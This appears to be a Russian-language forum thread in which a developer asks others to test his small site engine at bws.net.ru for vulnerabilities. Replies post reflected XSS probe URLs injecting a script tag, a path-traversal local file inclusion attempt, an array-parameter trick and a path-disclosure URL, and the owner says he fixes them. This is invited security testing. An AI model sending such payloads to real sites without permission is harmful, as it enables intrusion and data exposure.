![]() |
bws.net.ru
Разработал специальный мини движок для мини комерческих сайтов алянса с единой базой пользователей и платёжной системой на всех сайтах.
нужно проверить на уязвимости |
http://bws.net.ru/?nvg=office::services"><script>alert()</script>
http://bws.net.ru/?nvg=invest:service"><script>alert()</script> http://bws.net.ru/?nvg=crline:application"><script>alert()</script> |
спасибо, будет исправлено
|
PHP код:
PHP код:
|
их там не куча, а просто навигация одним файлом управляется, в нём подправить и всё
ЗЫ. ща исправлю, вчера на дачу ездил устал.. |
http://bws.net.ru/?com=../../../../../../../../../../../../../subscription../../../../../home/decide/domains/bws.net.ru/public_html/index
Я ваще не понял, что у тя там за проверка. Факт в том, что LFI не удался. Скажи, что за проверка, че за нах о_0 :-d |
PHP код:
результат: Warning: preg_match() expects parameter 2 to be string, array given in [path] |
вроде все теперь крикрыл, норм теперь...
но это конешно жеть было... http://www.bws.net.ru/?nvg="><script>alert()</script> |
http://bws.net.ru/?com=%3C раскрытие путей
|
PHP код:
PHP код:
PHP код:
|
| Время: 22:30 |